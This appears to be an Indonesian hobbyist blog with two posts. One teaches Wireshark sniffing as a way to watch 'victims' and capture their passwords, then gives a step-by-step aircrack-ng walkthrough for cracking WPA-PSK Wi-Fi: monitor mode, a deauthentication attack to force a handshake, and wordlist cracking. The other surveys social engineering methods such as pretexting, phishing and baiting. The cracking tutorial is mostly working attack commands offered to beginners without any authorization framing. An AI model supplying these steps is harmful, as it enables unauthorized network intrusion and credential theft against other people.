Sabtu, 29 September 2012

Wireshark vs WPA-PSK


Apa yang anda bayangkan bisa Hacker,???-          Bobol bank?
-          Bobol password?
-          Ngacak-ngacak blog / website?
-          Atau sekedar mencuri data informasi?
terlihat menarik bukan???!!!

Ada beberapa teknik dalam proses tersebut kali ini kita akan membahas mengenaiWIRESHARK..Wireshark ini merupakan software untuk melakukan analisa lalu-lintas jaringan komputer, yang memiliki fungsi-fungsi yang amat berguna bagi profesional jaringan, administrator jaringan, peneliti, hingga pengembang piranti lunak jaringan. contoh tampilan aplikasi wiresharknya Wireshark dapat membaca data secara 







langsung dari Ethernet, Token-Ring, FDDI, serial (PPP and SLIP), 802.11 wireless LAN , dan koneksi ATM. Hebat kan softwarenya…

mengapa diperlukan menganalisis paket-paket pada jaringan ?

1. admin sebuah jaringan menggunakan untuk troubleshoting pada jaringannya
2. teknisi keamanan jaringan menggunakan untuk memeriksa keamanan jaringan nya
3. banyak yang menggunakan untuk mempelajari protokol jaringanya sendiri
4. banyak juga yang menggunakan sebagai sniffer atau pengendus di jarigan 

wireshark ini mempunyai kelebiahan dan kekurangan juga tentu nya.


Program ini juga sering digunakan oleh chatters untuk mengetahui ip victimnya maupun para chatter lainnya lewat typingan room.Cara Menggunakan WireShark:o   Punya dulu aplikasi wiresharnya baru deh  Jalankan programnyao   Klik capture lalu optiono   Pada Interfacenya pastikan yang dipilih adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan cara untuk mengetahuinya adalah pilih salah satu kemudian lihat bawahnya pada tulisan ip addres: apabila status ip addresnya unknow, maka pilih intarface lainya dan pastikan ip addres anda tampil pada interface, maka pilih itu lalu klik start. Contoh ethernet card: SiS NIC SISNIC (Microsoft's Packet Scheduler) \Device\NPF_{A82B443F-9592-4213- BDAE-00AEC174ACB6}o   Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol starto   Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swticho   Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (melihat aktivitas vitctim)o   Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan victim ke website dan sebaliknya

memang masih banyak proses didalam nya yang perlu pedalaman ilmu lagi tapi setidaknya bisa berbagi walaupun sedikit yang diahami

          

memang masih banyak proses didalam nya yang perlu pedalaman ilmu lagi tapi setidaknya bisa berbagi walaupun sedikit yang diahami
            รจ Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.


Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.


-------
Nah yang berikut ini mengenai

cara melakukan menghacking jaringan infrastruktur dengan encryp WPA - PSK pada ubuntu

Sebelumnya ini hanya perkenalan atau mencoba berbagi ilmu tapi untuk kalangan newbie sebenarnya dan beberapa tergolong pemula, semoga dalam konteks ini bisa meningkatkan ilmu kita
semoga tutorial ini dapat membantu...



·         Sebagai informasi
pertama tama sebagaimana bisaa…


1. Siapkan CD Live Backtrack n tentunya dengan partnernya n of course sebatang rokok agar lebih santai..

2. masuk ke dekstop dengan perintah ~# startx

3. buka konsole dan ketikkan perintah :~# ifconfig -a


·        


4. :~# ifconfig wlan0 up (tuk mengaktifkan interface wlan0)




5. :~# airmon-ng

:~# airmon-ng start wlan0[/color] (tuk membuat virtual interface mode monitor)




6. ~# airodump-ng mon0 (tuk memonitoring jaringan yang ada di sekitar)

mon0 adalah interface virtual hasil dari airmon-ng tadi



hasil dari airodump-ng mon0




7. :~# airodump-ng -w test --channel 11 --bssid 00904c910001 mon0

(tuk memonitoring khusus jaringan yang memiliki bssid 00:90:4C:91:00:01 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama 'test')




8. :~# aireplay-ng -0 1 -a 00904c910001 -c oo1cbfa13fe3 mon0

(aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking)


-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth






9. setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah

:~# aircrack-ng test-01.cap -w /pentest/passwords/wordlists/inawpa.txt


inawpa.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/inawpa.txt





sebagai informasi, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya...jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang qt miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal.

SEMOGA DAPAT MEMBANTU BAGI PARA NEWBIE...
kalo ada kekurangan mohon dicerahkan..

Senin, 24 September 2012

sosial engineering ??



        Sosial engineering adalah mendapatkan informasi atau suatu rahasia dengan cara menipu pemilik informasi tersebut. Biasanya dilakukan dalam langkah melalui telepon ataupun internet, sekarang maraknya sekarang seperti misalnya di handpon kita sering mendapat SMS yang isi nya menyebutkan kita mendapatkan hadiah hingga 1 M, misalnya. atau banyak lagi lainya.
         sosial engineering ini merupakan metode yang digunakan oleh para hacker untuk memperoleh informasi dari kita pemilik informasi tadi, dan metode ini bukan satu-satunya metode untuk para hacker tentunya. cara ini dilakukan dengan langsung meminta sikorban atau target yang di incar oleh hacker untuk memperoleh informasi mengenai beliau atau bahkan melalui orang terdekat sekalian.


FACTOR  UTAMA PENYEBAB TERJADINYA SOSIAL ENGINEERING KEAMANAN
            Semua factor keamanan itu memang kembali lagi kepada usernya atau manusia tersebut, dimana factor ini mempunyai banyak kelemahan dibanding system keamanan yang sudah ada.
Beberapa tingkatan keamananya Factor Manusia dinilai sebagai tingkatan paling lemah dalam sebuah system keamanan. Kemudian dari segi administrator yang kurang kompoten. Kebanyakan masalah keamanan ini masih banyak yang kurang peduli akan hal ini, padahal akibat yang ditimbulkanya sangat mengangu. Kecerobohan kariayawan atau pekerja yang meninggalkan computer yang dipakai login tidak di logout sebelum meninggalkan ruangan kerja atau komputernya.
.
korban serangan social engineering, yaitu :
  • Receptionist dan/atau Help Desk sebuah perusahaan, karena merupakan pintu masuk ke dalam organisasi yang relatif memiliki data/informasi lengkap mengenai personel yang bekerja dalam lingkungan dimaksud;
  • Pendukung teknis dari divisi teknologi informasi – khususnya yang melayani pimpinan dan manajemen perusahaan, karena mereka biasanya memegang kunci  akses penting ke data dan informasi rahasia, berharga, dan strategis
  • Administrator sistem dan pengguna komputer, karena mereka memiliki otoritas untuk mengelola manajemen password dan account semua pengguna teknologi informasi di perusahaan;
  • Mitra kerja atau vendor perusahaan yang menjadi target, karena mereka adalah pihak yang menyediakan berbagai teknologi beserta fitur dan kapabilitasnya yang dipergunakan oleh segenap manajemen dan karyawan perusahaan; dan
  • Karyawan baru yang masih belum begitu paham mengenai prosedur standar keamanan informasi di perusahaan.



Secara garis besar social engineering dapat dilakukan dengan beberapa macam teknik, seperti :
  • Pretexting : Pretexting adalah suatu teknik untuk membuat dan menggunakan skenario yang diciptakan yang melibatkan korban yang ditargetkan dengan cara meningkatkan kemungkinan korban membocorkan informasinya. Pretexting bisa disebut sebagai kebohongan yang terencana dimana telah diadakan riset data sebelumnya untuk mendapatkan data-data akurat yang dapat meyakinkan target bahwa kita adalah pihak yang terautorifikasi.
  • Diversion Theft : Diversion Theft atau yang sering dikenal dengan Corner Game adalah pengalihan yang dilakukan oleh professional yang biasanya dilakukan pada bidan transportasi atau kurir. Dengan meyakinkan kurir bahwa kita adalah pihak legal, kita dapat mengubah tujuan pengiriman suatu barang ke tempat kita.
  • Phising : Phising adalah suatu teknik penipuan untuk mendapatkan informasi privat. Biasanya teknik phising dilakukan melalui email dengan mengirimkan kode verifikasi bank atau kartu kredit tertentu dan disertai dengan website palsu yang dibuat sedemikian rupa terlihat legal agar target dapat memasukkan account-nya. Teknik phising bisa dilakukan melalui berbagai macam media lain seperti telepon, sms, dsb.
  • Baiting : Baiting adalah Trojan horse yang diberikan melalui media elektronik pada target yang mengandalkan rasa ingin tahu target. Serangan ini dilakukan dengan menginjeksi malware ke dalam flash disk, atau storage lainnya dan meninggalkannya di tempat umum, seperti toilet umum, telepon umum, dll dengan harapan target akan mengambilnya dan menggunakannya pada komputernya.
  • Quid pro pro : Quid pro pro adalah sesuatu untuk sesuatu. Penyerang akan menelpon secara acak kepada suatu perusahaan dan mengaku berasal dari technical support dan berharap user menelpon balik untuk meminta bantuan. Kemudian, penyerang akan “membantu” menyelesaikan masalah mereka dan secara diam-diam telah memasukkan malware ke dalam komputer target.
  • Dumpster diving : Dumpster diving adalah pengkoleksian data dari sampah perusahaan. Bagi perusahaan yang tidak mengetahui betapa berharganya sampah mereka akan menjadi target para hacker. Dari sampah yang dikumpulkan seperti buku telepon, buku manual, dan sebagainya akan memberikan hacker akses besar pada perusahaan tersebut.
  • Persuasion : Persuasion lebih dapat disebut sebagai teknik psikologis, yaitu memanfaatkan psikologis target untuk dapat memperoleh informasi rahasia suatu perusahaan. Metode dasar dari persuasi ini adalah peniruan, menjilat, kenyamanan, dan berpura-pura sebagai teman lama.

Teknik-teknik ini biasanya dilakukan dengan menggunakan skenario tertentu untuk dapat mencapainya.
Skemah melakuakan Social Engineering
Pada dasarnya teknik social engineering dapat dibagi menjadi dua jenis, yaitu: berbasis interaksi sosial dan berbasis interaksi komputer. Berikut adalah sejumlah teknik social engineering yang biasa dipergunakan.
Untuk skenario dengan basis interaksi sosial, ada beberapa modus skenario, antara lain: 
  • Berlaku sebagai User penting, 
  • Berlaku sebagai User yang sah, 
  • Kedok sebagai Mitra Vendor, 
  • Kedok sebagai Konsultan Audit, 
  • Kedok sebagai Penegak Hukum


Sementara itu untuk jenis kedua, yaitu menggunakan komputer atau piranti elektronik/digital lain sebagai alat bantu, cukup banyak modus operandi yang sering dipergunakan seperti :
  • Teknik phising melalui email, 
  • Teknik phising melalui SMS, 
  • Teknik phising melalui pop up window.


Itu dia modus-modus dalam social engineering. Ada banyak lagi cara yang baru yang sedang berkembang di luar sana maka hendaknya kita lebih paham akan keamanan. Hendaknya kita lebih mengutamakan hal tersebut. Kita telah mengetahui bahwa factor Social Engineerig tersebut terjadi karena factor manusianya itu sendiri.